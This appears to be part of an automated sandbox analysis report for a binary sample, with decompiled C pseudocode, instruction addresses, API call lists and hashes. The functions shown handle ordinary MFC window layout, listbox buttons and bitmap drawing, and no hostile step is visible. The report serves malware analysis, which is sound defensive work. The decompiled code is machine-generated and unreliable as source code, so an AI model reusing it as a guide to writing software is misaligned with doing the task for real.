										E00DF47C5(_v724);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t164 = _t244;
							L40:
							_pop(_t247);
							_pop(_t250);
							_pop(_t213);
							return E00DDCBCE(_t164, _t213, _v8 ^ _t260, _t244, _t247, _t250);
						}
						goto L51;
					}
					asm("sbb eax, eax");
					_t167 = _t166 | 0x00000001;
					__eflags = _t167;
					goto L8;
				}
				L51:
			}

0x00df333e
0x00df3349
0x00df3350
0x00df3353
0x00df3354
0x00df3357
0x00df335b
0x00df335c
0x00df335f
0x00df336f
0x00df3392
0x00df3397
0x00df339c
0x00df3652
0x00df3652
0x00df3652
0x00000000
0x00df33a2
0x00df33a2
0x00df33a5
0x00df33a8
0x00df33ae
0x00df33b4
0x00df33b7
0x00df33b9
0x00df33bc
0x00df33c6
0x00df33cc
0x00000000
0x00000000
0x00df33d2
0x00df33fb
0x00df33fb
0x00df33d4
0x00df33d4
0x00df33dc
0x00df33e3
0x00df33e9
0x00000000
0x00df33eb
0x00df33eb
0x00df33ee
0x00df33f9
0x00000000
0x00000000
0x00000000
0x00000000
0x00df33f9
0x00df33e9
0x00df3408
0x00df340a
0x00df3413
0x00df3419
0x00df341c
0x00df341c
0x00df341f
0x00df3422
0x00df3422
0x00df3432
0x00df3440
0x00df3445
0x00df344c
0x00df344e
0x00000000
0x00df3454
0x00df345a
0x00df3467
0x00df3470
0x00df3476
0x00df3483
0x00df348a
0x00df348f
0x00df3492
0x00df3494
0x00df36d2
0x00df36d8
0x00df36d9
0x00df36da
0x00df36db
0x00df36dc
0x00df36dd
0x00df36e2
0x00df36e5
0x00df36e8
0x00df36e9
0x00df36fb
0x00df3700
0x00df3702
0x00df370b
0x00000000
0x00df370b
0x00df3704
0x00df3707
0x00df3709
0x00000000
0x00000000
0x00df3711
0x00df349a
0x00df349a
0x00df34a8
0x00df34ab
0x00df34c1
0x00df34c8
0x00df34cd
0x00df34ad
0x00df34ad
0x00df34b5
0x00000000
0x00df34b7
0x00df34b7
0x00df34bd
0x00df34bd
0x00df34b5
0x00df34d4
0x00df34db
0x00df34de
0x00df35dc
0x00df35df
0x00df35ec
0x00df35ef
0x00df35f7
0x00df35f7
0x00df35e1
0x00df35e7
0x00df35e7
0x00df34e4
0x00df34e4
0x00df34f0
0x00df34f6
0x00df34fc
0x00df34ff
0x00df3505
0x00df3508
0x00df350b
0x00000000
0x00000000
0x00df350d
0x00df3516
0x00df351a
0x00df3523
0x00df3527
0x00df3528
0x00df352e
0x00df3534
0x00df353a
0x00df353d
0x00000000
0x00000000
0x00df353f
0x00df355e
0x00df355e
0x00df3561
0x00df357e
0x00df3583
0x00df3586
0x00df3588
0x00df35c6
0x00df358a
0x00df358a
0x00df3590
0x00df3595
0x00df359d
0x00df359e
0x00df359e
0x00df35b5
0x00df35bc
0x00df35bf
0x00df35c1
0x00df35c1
0x00df35cc
0x00df35d2
0x00df35d2
0x00df35d7
0x00000000
0x00df35d7
0x00df3541
0x00df3543
0x00df3548
0x00df354e
0x00df3557
0x00df355a
0x00df355a
0x00000000
0x00df3543
0x00df35fa
0x00df35fa
0x00df35fe
0x00df3606
0x00df360c
0x00df360f
0x00df3615
0x00df3617
0x00df3663
0x00df3669
0x00df36b5
0x00df36b5
0x00df366b
0x00df3670
0x00df3670
0x00df3676
0x00df367a
0x00000000
0x00df367c
0x00df3680
0x00df3689
0x00df3695
0x00df369a
0x00df36a3
0x00df36a9
0x00df36ac
0x00df36ac
0x00df367a
0x00df36bb
0x00df36c3
0x00df36c9
0x00df36cc
0x00df3619
0x00df361f
0x00df3629
0x00df363b
0x00df3642
0x00df364f
0x00000000
0x00df364f
0x00000000
0x00df3617
0x00df3494
0x00df340c
0x00df340c
0x00df3654
0x00df3657
0x00df3658
0x00df365b
0x00df3662
0x00df3662
0x00000000
0x00df340a
0x00df3403
0x00df3405
0x00df3405
0x00000000
0x00df3405
0x00000000

APIs

Part of subcall function 00DF4B3D: GetLastError.KERNEL32(?,00000000,?,00DE30DC,00000000,00000000,?,?,00DE295D,00000000,00000000,00000000), ref: 00DF4B42
Part of subcall function 00DF4B3D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00DE295D,00000000,00000000,00000000), ref: 00DF4BE0

_free.LIBCMT ref: 00DF3629
_free.LIBCMT ref: 00DF3642
_free.LIBCMT ref: 00DF3680
_free.LIBCMT ref: 00DF3689
_free.LIBCMT ref: 00DF3695

Strings

C, xrefs: 00DF349A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 979ffb2e7a06f9fdeb0fd7b426b4ad3bb7500a0e35a18d16387a2b5d3b92907a
Instruction ID: 75968332b8c9f00483f6a3bc86be3a40a0f47ac429207a42482b1c0f8c4c0725
Opcode Fuzzy Hash: 979ffb2e7a06f9fdeb0fd7b426b4ad3bb7500a0e35a18d16387a2b5d3b92907a
Instruction Fuzzy Hash: C2B15E75901219DFDB25DF18C884AADB7B4FF48304F1685AAEA4AA7350D731AE90CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CD5755 Relevance: 10.7, APIs: 7, Instructions: 185
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00CD5755(void* __ebx, intOrPtr* __ecx, void* __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				intOrPtr _t74;
				void* _t79;
				signed int _t87;
				void* _t104;
				void* _t118;
				intOrPtr* _t123;
				signed int _t129;
				signed int _t130;
				intOrPtr* _t139;
				void* _t156;
				intOrPtr* _t157;
				void* _t160;
				intOrPtr* _t165;
				void* _t168;

				_t158 = __esi;
				_t154 = __edi;
				_t150 = __edx;
				_push(0x64);
				E00DDD55F(0xe0a157, __ebx, __edi, __esi);
				_t123 = __ecx;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
					L17:
					return E00DDD50E(_t123, _t154, _t158);
				} else {
					_t158 =  *((intOrPtr*)( *__ecx + 0x1c4));
					 *0xe17a64();
					_t74 = E00CB277F(__ecx, __ecx, __edx,  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x1c4))))());
					 *((intOrPtr*)(_t168 - 0x5c)) = _t74;
					_t172 = _t74;
					if(_t74 == 0) {
						goto L17;
					} else {
						 *(_t168 - 0x20) = 0;
						 *((intOrPtr*)(_t168 - 0x1c)) = 0;
						 *((intOrPtr*)(_t168 - 0x18)) = 0;
						 *((intOrPtr*)(_t168 - 0x14)) = 0;
						GetClientRect( *(_t123 + 0x20), _t168 - 0x20);
						asm("movsd");
						_t127 = _t168 - 0x70;
						_push(_t123);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E00CB8FDD(_t123, _t168 - 0x70, _t150, _t123 + 0xf4, _t168 - 0x20, _t172);
						 *(_t168 - 4) =  *(_t168 - 4) & 0x00000000;
						_t79 = _t123 + 0x104;
						_t160 = 0;
						if(_t79 == 0 ||  *((intOrPtr*)(_t79 + 4)) == 0) {
							_t156 = E00CCDE3C(E00CB277F(_t123, _t127, _t150, GetParent( *(_t123 + 0x20))));
							__eflags = _t156;
							if(__eflags == 0) {
								goto L8;
							} else {
								SendMessageA( *( *((intOrPtr*)(_t168 - 0x5c)) + 0x20), 0x30,  *(_t156 + 4), 0);
								_t139 = _t168 - 0x70;
								_t118 = E00CBA2B8(_t139, _t156);
								_t163 = _t118;
								__eflags = _t118;
								if(__eflags == 0) {
									goto L18;
								} else {
									goto L8;
								}
							}
						} else {
							_t160 = E00CBA2B8(_t168 - 0x70, _t79);
							SendMessageA( *( *((intOrPtr*)(_t168 - 0x5c)) + 0x20), 0x30,  *(_t123 + 0x108), 0);
							L8:
							GetTextMetricsA( *(_t168 - 0x68), _t168 - 0x58);
							if(_t160 != 0) {
								E00CBA2B8(_t168 - 0x70, _t160);
							}
							_t129 = 3;
							asm("cdq");
							_t87 = ( *(_t168 - 0x58) << 2) / _t129;
							_t130 =  *(_t123 + 0xf0);
							if(_t87 <= _t130) {
								_t87 = _t130;
							}
							_t152 =  *((intOrPtr*)(_t168 - 0x18));
							_t132 =  *((intOrPtr*)(_t123 + 0xf8)) + _t87;
							_t154 =  *((intOrPtr*)(_t123 + 0x88));
							_t163 =  *((intOrPtr*)(_t168 - 0x18)) -  *((intOrPtr*)(_t123 + 0xec)) - 1;
							 *((intOrPtr*)(_t123 + 0x100)) =  *((intOrPtr*)(_t123 + 0xf8)) + _t87;
							if(_t154 == 0) {
								L16:
								E00CB7930( *((intOrPtr*)(_t168 - 0x5c)),  *(_t168 - 0x20), _t132 -  *((intOrPtr*)(_t123 + 0xf8)) +  *((intOrPtr*)(_t168 - 0x1c)), _t152 -  *(_t168 - 0x20),  *((intOrPtr*)(_t123 + 0xf8)) - _t132 -  *((intOrPtr*)(_t168 - 0x1c)) +  *((intOrPtr*)(_t168 - 0x14)), 1);
								_t158 =  *((intOrPtr*)( *_t123 + 0x1cc));
								 *0xe17a64();
								 *((intOrPtr*)( *((intOrPtr*)( *_t123 + 0x1cc))))();
								E00CB9150(_t168 - 0x70);
								goto L17;
							} else {
								while(1) {
									_t139 =  *((intOrPtr*)(_t154 + 8));
									_t154 =  *((intOrPtr*)(_t154 + 4));
									if(_t139 == 0) {
										break;
									}
									E00CB7930(_t139, _t163,  *((intOrPtr*)(_t168 - 0x1c)) + 1,  *((intOrPtr*)(_t123 + 0xec)),  *((intOrPtr*)(_t123 + 0x100)) -  *((intOrPtr*)(_t123 + 0xf8)) - 2, 1);
									_t163 = _t163 -  *((intOrPtr*)(_t123 + 0xec));
									if(_t154 != 0) {
										continue;
									} else {
										_t132 =  *((intOrPtr*)(_t123 + 0x100));
										_t152 =  *((intOrPtr*)(_t168 - 0x18));
										goto L16;
									}
									goto L19;
								}
								L18:
								E00CAA4E7(_t123, _t139, _t154, _t163, __eflags);
								asm("int3");
								E00DDD52C(0xe08583, _t123, _t154, _t163);
								_t157 = _t139;
								_t165 =  *((intOrPtr*)( *_t157 + 0x16c));
								E00CA2ABC(_t123, _t168 - 0x10, _t157, _t165, __eflags);
								 *(_t168 - 4) =  *(_t168 - 4) & 0x00000000;
								 *0xe17a64(_t168 - 0x10, 0, 0xffffffff, 0xe4bcbb, 4);
								_t104 =  *_t165();
								 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t168 - 0x10)) + 0xfffffff0;
								E00CA2975(_t104,  *((intOrPtr*)(_t168 - 0x10)) + 0xfffffff0);
								 *((intOrPtr*)(_t157 + 0xd8)) = 1;
								 *0xe17a64(_t104);
								return E00DDD4FA( *((intOrPtr*)( *((intOrPtr*)( *_t157 + 0x190))))());
							}
						}
					}
				}
				L19:
			}

0x00cd5755
0x00cd5755
0x00cd5755
0x00cd5755
0x00cd575c
0x00cd5761
0x00cd5765
0x00cd5923
0x00cd5928
0x00cd5775
0x00cd5777
0x00cd577f
0x00cd578a
0x00cd578f
0x00cd5792
0x00cd5794
0x00000000
0x00cd579a
0x00cd579c
0x00cd579f
0x00cd57a2
0x00cd57a5
0x00cd57af
0x00cd57be
0x00cd57bf
0x00cd57c2
0x00cd57c3
0x00cd57c4
0x00cd57c5
0x00cd57c6
0x00cd57cb
0x00cd57cf
0x00cd57d5
0x00cd57d9
0x00cd5819
0x00cd581b
0x00cd581d
0x00000000
0x00cd581f
0x00cd582c
0x00cd5833
0x00cd5836
0x00cd583b
0x00cd583d
0x00cd583f
0x00000000
0x00000000
0x00000000
0x00000000
0x00cd583f
0x00cd57e0
0x00cd57f1
0x00cd57fb
0x00cd5845
0x00cd584c
0x00cd5854
0x00cd585a
0x00cd585a
0x00cd5867
0x00cd5868
0x00cd5869
0x00cd586b
0x00cd5873
0x00cd5875
0x00cd5875
0x00cd5877
0x00cd5888
0x00cd588a
0x00cd5890
0x00cd5891
0x00cd5899
0x00cd58df
0x00cd5902
0x00cd5909
0x00cd5911
0x00cd5919
0x00cd591e
0x00000000
0x00cd589b
0x00cd589b
0x00cd589b
0x00cd589e
0x00cd58a3
0x00000000
0x00000000
0x00cd58c7
0x00cd58cc
0x00cd58d4
0x00000000
0x00cd58d6
0x00cd58d6
0x00cd58dc
0x00000000
0x00cd58dc
0x00000000
0x00cd58d4
0x00cd5929
0x00cd5929
0x00cd592e
0x00cd5936
0x00cd593b
0x00cd5947
0x00cd594d
0x00cd5952
0x00cd5960
0x00cd5968
0x00cd596f
0x00cd5973
0x00cd5976
0x00cd597e
0x00cd5990
0x00cd599f
0x00cd599f
0x00cd5899
0x00cd57d9
0x00cd5794
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00CD575C
GetClientRect.USER32(00000000,00000000), ref: 00CD57AF

Part of subcall function 00CB8FDD: __EH_prolog3.LIBCMT ref: 00CB8FE4
Part of subcall function 00CB8FDD: GetDC.USER32(00000000), ref: 00CB9010

SendMessageA.USER32(00000000,00000030,?,00000000), ref: 00CD57FB
GetParent.USER32(00000000), ref: 00CD5806
SendMessageA.USER32(00000000,00000030,?,00000000), ref: 00CD582C
GetTextMetricsA.GDI32(?,?), ref: 00CD584C

Part of subcall function 00CBA2B8: SelectObject.GDI32(?,00000000), ref: 00CBA2DC
Part of subcall function 00CBA2B8: SelectObject.GDI32(?,00000000), ref: 00CBA2F4

__EH_prolog3.LIBCMT ref: 00CD5936

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3MessageObjectSelectSend$ClientH_prolog3_MetricsParentRectText
String ID:
API String ID: 3349635734-0
Opcode ID: 9e2a366cf9480b17f28c089723cc06cc9c1cbb65a1aaa19efe3445b1d635c9fc
Instruction ID: 70f5f065883da3665d3f0812ffc50e2d2b93904d787e0871521868f57c3dcf90
Opcode Fuzzy Hash: 9e2a366cf9480b17f28c089723cc06cc9c1cbb65a1aaa19efe3445b1d635c9fc
Instruction Fuzzy Hash: EB617971A006169FCF14DFA8CC94BEE77B6BF48710F144169E919AB395CB30AE05DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CD6420 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00CD6420(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, signed char* _a4, signed int* _a8) {
				char _v8;
				char _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v48;
				signed int _t60;
				signed int* _t69;
				intOrPtr* _t77;
				void* _t90;
				signed char* _t92;
				intOrPtr* _t93;
				signed int _t96;

				_t95 = __esi;
				_t90 = __edx;
				_t77 = __ecx;
				_push(__ebx);
				_push(__edi);
				_t92 = _a4;
				_t74 = __ecx;
				if(_t92 == 0) {
					L5:
					E00CAA4E7(_t74, _t77, _t92, _t95, __eflags);
					asm("int3");
					_push(0x20);
					E00DDD52C(0xe0a1f2, _t74, _t92, _t95);
					_t93 = _t77;
					E00CA67E1( &_v20);
					_v8 = 0;
					E00CC1628(_a8,  &_v20, _a4);
					_push(_v20);
					E00D0EB00(0,  &_v48, _t93, _t95, __eflags);
					_v8 = 1;
					_push( &_v24);
					_push("MFCVSListbox_BrowseButton");
					_v24 = 1;
					_push( &_v48);
					__eflags = E00D1034D(0, _t93, _t95, __eflags);
					if(__eflags != 0) {
						 *((intOrPtr*)(_t93 + 0xe0)) = _v24;
					}
					_v28 = 0;
					_push( &_v28);
					_push("MFCVSListbox_NewButton");
					_t96 = 0;
					_push( &_v48);
					__eflags = E00D1034D(0, _t93, 0, __eflags);
					if(__eflags != 0) {
						__eflags = _v28;
						if(__eflags != 0) {
							__eflags = E00CD5B52(_t93, 0xfffffff5) - 0xffffffff;
							if(__eflags == 0) {
								_t96 = 1;
								__eflags = 1;
							}
						}
					}
					_v32 = 0;
					_push( &_v32);
					_push("MFCVSListbox_RemoveButton");
					_push( &_v48);
					__eflags = E00D1034D(0, _t93, _t96, __eflags);
					if(__eflags != 0) {
						__eflags = _v32;
						if(__eflags != 0) {
							__eflags = E00CD5B52(_t93, 0xfffffff4) - 0xffffffff;
							if(__eflags == 0) {
								_t96 = _t96 | 0x00000002;
								__eflags = _t96;
							}
						}
					}
					_v36 = 0;
					_push( &_v36);
					_push("MFCVSListbox_UpButton");
					_push( &_v48);
					__eflags = E00D1034D(0, _t93, _t96, __eflags);
					if(__eflags != 0) {
						__eflags = _v36;
						if(__eflags != 0) {
							__eflags = E00CD5B52(_t93, 0xfffffff3) - 0xffffffff;
							if(__eflags == 0) {
								_t96 = _t96 | 0x00000004;
								__eflags = _t96;
							}
						}
					}
					_v40 = 0;
					_push( &_v40);
					_push("MFCVSListbox_DownButton");
					_push( &_v48);
					_t60 = E00D1034D(0, _t93, _t96, __eflags);
					__eflags = _t60;
					if(_t60 != 0) {
						__eflags = _v40;
						if(_v40 != 0) {
							_t60 = E00CD5B52(_t93, 0xfffffff2);
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								_t96 = _t96 | 0x00000008;
								__eflags = _t96;
							}
						}
					}
					__eflags = _t96;
					if(__eflags != 0) {
						_push(_t96);
						_t60 = E00CD6ED7(0, _t93, _t90, _t93, _t96, __eflags);
					}
					E00CA2975(E00D0EB37(_t60,  &_v48), _v20 - 0x10);
					__eflags = 0;
					return E00DDD4FA(0);
				} else {
					_t92 =  &(_t92[0xc]);
					if(_t92 == 0) {
						goto L5;
					} else {
						if(( *_t92 & 0x00000002) != 0) {
							 *0xe17a64(_t92, __esi);
							_t92[0x1c] =  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x1a0))))();
						}
						_t69 = _a8;
						 *_t69 =  *_t69 & 0x00000000;
						return _t69;
					}
				}
			}

0x00cd6420
0x00cd6420
0x00cd6420
0x00cd6423
0x00cd6424
0x00cd6425
0x00cd6428
0x00cd642c
0x00cd645e
0x00cd645e
0x00cd6463
0x00cd6464
0x00cd646b
0x00cd6470
0x00cd6475
0x00cd6486
0x00cd6489
0x00cd648e
0x00cd6494
0x00cd649c
0x00cd64a0
0x00cd64a1
0x00cd64a9
0x00cd64b0
0x00cd64b6
0x00cd64b8
0x00cd64bd
0x00cd64bd
0x00cd64c6
0x00cd64c9
0x00cd64ca
0x00cd64d2
0x00cd64d4
0x00cd64da
0x00cd64dc
0x00cd64de
0x00cd64e1
0x00cd64ec
0x00cd64ef
0x00cd64f3
0x00cd64f3
0x00cd64f3
0x00cd64ef
0x00cd64e1
0x00cd64f7
0x00cd64fa
0x00cd64fb
0x00cd6503
0x00cd6509
0x00cd650b
0x00cd650d
0x00cd6511
0x00cd651c
0x00cd651f
0x00cd6521
0x00cd6521
0x00cd6521
0x00cd651f
0x00cd6511
0x00cd6527
0x00cd652a
0x00cd652b
0x00cd6533
0x00cd6539
0x00cd653b
0x00cd653d
0x00cd6541
0x00cd654c
0x00cd654f
0x00cd6551
0x00cd6551
0x00cd6551
0x00cd654f
0x00cd6541
0x00cd6557
0x00cd655a
0x00cd655b
0x00cd6563
0x00cd6564
0x00cd6569
0x00cd656b
0x00cd656d
0x00cd6571
0x00cd6577
0x00cd657c
0x00cd657f
0x00cd6581
0x00cd6581
0x00cd6581
0x00cd657f
0x00cd6571
0x00cd6584
0x00cd6586
0x00cd6588
0x00cd658b
0x00cd658b
0x00cd659e
0x00cd65a3
0x00cd65aa
0x00cd642e
0x00cd642e
0x00cd6431
0x00000000
0x00cd6433
0x00cd6436
0x00cd6444
0x00cd644e
0x00cd6451
0x00cd6452
0x00cd6457
0x00cd645b
0x00cd645b
0x00cd6431

APIs

__EH_prolog3.LIBCMT ref: 00CD646B

Strings

MFCVSListbox_RemoveButton, xrefs: 00CD64FB
MFCVSListbox_UpButton, xrefs: 00CD652B
MFCVSListbox_NewButton, xrefs: 00CD64CA
MFCVSListbox_BrowseButton, xrefs: 00CD64A1
MFCVSListbox_DownButton, xrefs: 00CD655B

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3
String ID: MFCVSListbox_BrowseButton$MFCVSListbox_DownButton$MFCVSListbox_NewButton$MFCVSListbox_RemoveButton$MFCVSListbox_UpButton
API String ID: 431132790-4178308353
Opcode ID: 2643479cc0bfde434e2b0f356b4fcc6105eb10956d12bcffffc6b2a7bbc37ada
Instruction ID: 2e4b2b86ae452d7d8cc45073ed5a6abb309e0f5dc7b183ef8eac8dbae27f24ac
Opcode Fuzzy Hash: 2643479cc0bfde434e2b0f356b4fcc6105eb10956d12bcffffc6b2a7bbc37ada
Instruction Fuzzy Hash: E7416071D002199BDF14EBA8D885AFEB7A8EF45324F144627E931A33D1DB749E84CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA98F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CDA98F(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _t71;
				int _t80;
				void* _t83;
				struct HBRUSH__* _t84;
				void* _t85;
				void* _t95;
				struct HBRUSH__* _t96;
				short _t108;
				int _t123;
				signed int _t125;
				signed int _t126;
				void* _t127;
				void* _t128;
				void* _t132;

				_t132 = __fp0;
				_t128 = __eflags;
				_t118 = __edx;
				_t102 = __ebx;
				E00DDD55F(0xe0a65a, __ebx, __edi, __esi);
				_t125 = __ecx;
				_t121 =  *(_t127 + 8);
				 *(_t127 - 0x64) =  *(_t127 + 8);
				_t71 = E00CB90E5(__ebx, _t127 - 0x88, __edx, _t121, __ecx, _t128, 0, 0x7c);
				 *(_t127 - 4) =  *(_t127 - 4) & 0x00000000;
				asm("sbb eax, eax");
				 *(_t127 - 0x5c) = _t71 &  *(_t127 + 0xc);
				E00CB9032(_t127 - 0x74);
				 *(_t127 - 4) = 1;
				E00CB9B84(_t102, _t127 - 0x74, CreateCompatibleDC(0));
				 *(_t127 - 0x54) =  *(_t127 - 0x54) & 0x00000000;
				 *((intOrPtr*)(_t127 - 0x58)) = 0xe196b4;
				_t123 =  *(_t125 + 0x54);
				 *(_t127 - 4) = 2;
				 *(_t127 - 0x50) =  *(_t125 + 0x58);
				if(L00CDD486(_t125) == 0) {
					_t80 =  *(_t127 - 0x50);
				} else {
					_t80 =  *(_t125 + 0x60);
					_t123 =  *(_t125 + 0x5c);
					 *(_t127 - 0x50) = _t80;
				}
				_t108 = 0x20;
				if( *(_t127 - 0x5c) == 0) {
					_t81 = CreateCompatibleBitmap( *(_t127 - 0x84), _t123, _t80);
					goto L7;
				} else {
					 *(_t127 - 0x44) = _t80;
					_t118 = 1;
					 *((short*)(_t127 - 0x3e)) = _t108;
					 *(_t127 - 0x4c) = 0x28;
					 *(_t127 - 0x38) = _t80 * _t123;
					 *(_t127 - 0x48) = _t123;
					 *((short*)(_t127 - 0x40)) = 1;
					 *((intOrPtr*)(_t127 - 0x3c)) = 0;
					 *((intOrPtr*)(_t127 - 0x34)) = 0;
					 *((intOrPtr*)(_t127 - 0x30)) = 0;
					 *((intOrPtr*)(_t127 - 0x2c)) = 0;
					 *((intOrPtr*)(_t127 - 0x28)) = 0;
					 *(_t127 - 0x60) = 0;
					if(CreateDIBSection( *(_t127 - 0x70), _t127 - 0x4c, 0, _t127 - 0x60, 0, 0) != 0) {
						L7:
						E00CB9BC6(_t102, _t127 - 0x58, _t123, _t81);
						_t83 = E00CBA251( *(_t127 - 0x70),  *(_t127 - 0x54));
						__eflags =  *(_t127 - 0x5c);
						 *(_t127 - 0x60) = _t83;
						if( *(_t127 - 0x5c) == 0) {
							_t95 = E00CC19ED();
							 *(_t127 - 0x20) =  *(_t127 - 0x20) & 0x00000000;
							 *(_t127 - 0x1c) =  *(_t127 - 0x1c) & 0x00000000;
							 *(_t127 - 0x18) = _t123;
							 *(_t127 - 0x14) =  *(_t127 - 0x50);
							_t96 = _t95 + 0x98;
							__eflags = _t96;
							if(_t96 != 0) {
								_t96 =  *(_t96 + 4);
							}
							FillRect( *(_t127 - 0x70), _t127 - 0x20, _t96);
						}
						_t84 =  *(_t127 - 0x64);
						__eflags = _t84;
						if(_t84 != 0) {
							__eflags = 0;
							E00CDCB6F(_t127 - 0x74, 0, 0, _t123,  *(_t127 - 0x50), _t84, 0, 0);
						}
						_t85 =  *(_t127 - 0x60);
						__eflags = _t85;
						if(_t85 != 0) {
							_t85 =  *(_t85 + 4);
						}
						E00CBA251( *(_t127 - 0x70), _t85);
						__eflags =  *(_t127 - 0x5c);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t125 + 8)) = 0x20;
							E00CDE938(_t123,  *(_t127 - 0x54),  *((intOrPtr*)(_t125 + 0x3c)));
						}
						_push(0);
						_push( *(_t127 - 0x54));
						_t126 = L00CDAB41(_t102, _t125, _t123, _t125, __eflags, _t132);
					} else {
						_t126 = _t125 | 0xffffffff;
					}
				}
				 *((intOrPtr*)(_t127 - 0x58)) = 0xe196b4;
				E00CB91F0(_t127 - 0x58, _t118);
				E00CB91A4(_t127 - 0x74);
				E00CB9360(_t127 - 0x88);
				return E00DDD50E(_t102, _t123, _t126);
			}

0x00cda98f
0x00cda98f
0x00cda98f
0x00cda98f
0x00cda996
0x00cda99b
0x00cda99d
0x00cda9a8
0x00cda9ab
0x00cda9b0
0x00cda9b9
0x00cda9be
0x00cda9c1
0x00cda9cb
0x00cda9d8
0x00cda9dd
0x00cda9e1
0x00cda9ed
0x00cda9f0
0x00cda9f4
0x00cda9fe
0x00cdaa0b
0x00cdaa00
0x00cdaa00
0x00cdaa03
0x00cdaa06
0x00cdaa06
0x00cdaa14
0x00cdaa15
0x00cdaa71
0x00000000
0x00cdaa17
0x00cdaa17
0x00cdaa1f
0x00cdaa20
0x00cdaa28
0x00cdaa2f
0x00cdaa3a
0x00cdaa41
0x00cdaa45
0x00cdaa48
0x00cdaa4b
0x00cdaa4e
0x00cdaa51
0x00cdaa54
0x00cdaa5f
0x00cdaa77
0x00cdaa7b
0x00cdaa86
0x00cdaa8b
0x00cdaa8f
0x00cdaa92
0x00cdaa94
0x00cdaa99
0x00cdaa9d
0x00cdaaa4
0x00cdaaa7
0x00cdaaaa
0x00cdaaaa
0x00cdaaaf
0x00cdaab1
0x00cdaab1
0x00cdaabc
0x00cdaabc
0x00cdaac2
0x00cdaac5
0x00cdaac7
0x00cdaac9
0x00cdaad7
0x00cdaad7
0x00cdaadc
0x00cdaadf
0x00cdaae1
0x00cdaae3
0x00cdaae3
0x00cdaaea
0x00cdaaef
0x00cdaaf3
0x00cdaaf8
0x00cdab02
0x00cdab02
0x00cdab07
0x00cdab09
0x00cdab13
0x00cdaa61
0x00cdaa61
0x00cdaa61
0x00cdaa5f
0x00cdab18
0x00cdab1f
0x00cdab27
0x00cdab32
0x00cdab3e

APIs

__EH_prolog3_GS.LIBCMT ref: 00CDA996

Part of subcall function 00CB90E5: __EH_prolog3.LIBCMT ref: 00CB90EC
Part of subcall function 00CB90E5: GetWindowDC.USER32(00000000,00000004,00CD9743,00000000), ref: 00CB9118

CreateCompatibleDC.GDI32(00000000), ref: 00CDA9CE
CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 00CDAA57
CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 00CDAA71

Part of subcall function 00CBA251: SelectObject.GDI32(0000005C,?), ref: 00CBA25A

FillRect.USER32 ref: 00CDAABC

Strings

